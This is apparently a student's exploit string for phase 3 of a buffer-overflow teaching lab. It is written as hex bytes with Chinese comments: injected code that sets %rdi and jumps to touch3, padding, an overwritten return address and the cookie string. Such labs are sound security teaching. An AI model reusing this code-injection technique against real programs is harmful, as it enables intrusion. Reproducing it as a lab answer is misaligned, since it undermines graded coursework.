/* question3: */
48 c7 c7 a8 dc 61 55 /* mov $0x5561dca8,%rdi 设置$rdi指向string内存地址 */
68 fa 18 40 00       /* pushq  $0x4018fa     push touch3的地址 */
c3                   /* ret                  返回 */
/* 上面一共13个字节, buf一共40个字节所以需要填充 40-13=27个字节 */
00 00 00 00 00 00 00 00 /* 8 bytes */
00 00 00 00 00 00 00 00 /* 8 bytes */
00 00 00 00 00 00 00 00 /* 8 bytes */
00 00 00                /* 3 bytes */
78 dc 61 55 00 00 00 00 /* exploit string code 的开始地址（即get buf的栈地地址) */
35 39 62 39 39 37 66 61 00 /* 继续覆盖为cookie string */

